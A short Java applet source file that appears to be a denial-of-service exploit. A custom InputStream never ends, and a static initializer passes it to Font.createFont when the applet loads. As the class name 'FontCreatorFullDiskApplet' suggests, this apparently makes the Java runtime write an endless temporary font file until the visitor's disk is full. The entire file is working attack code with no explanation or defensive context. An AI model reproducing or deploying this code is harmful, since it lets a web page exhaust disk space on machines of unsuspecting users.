01 import java.applet.Applet;
02 import java.awt.Font;
03 import java.io.InputStream;
04
05 class MIS extends InputStream
06 {
07
08 MIS()
09 {
10 }
11
12 public int read()
13 {
14 return 0;
15 }
16
17 public int read(byte abyte0[], int i, int j)
18 {
19 return j - i;
20 }
21 }
22
23
24 public class FontCreatorFullDiskApplet extends Applet
25 {
26
27 public FontCreatorFullDiskApplet()
28 {
29 }
30
31 static
32 {
33 try
34 {
35 byte abyte0[] = new byte[0];
36 Font font = Font.createFont(0, new MIS());
37 }
38 catch(Exception exception) { }
39 }
40 }
|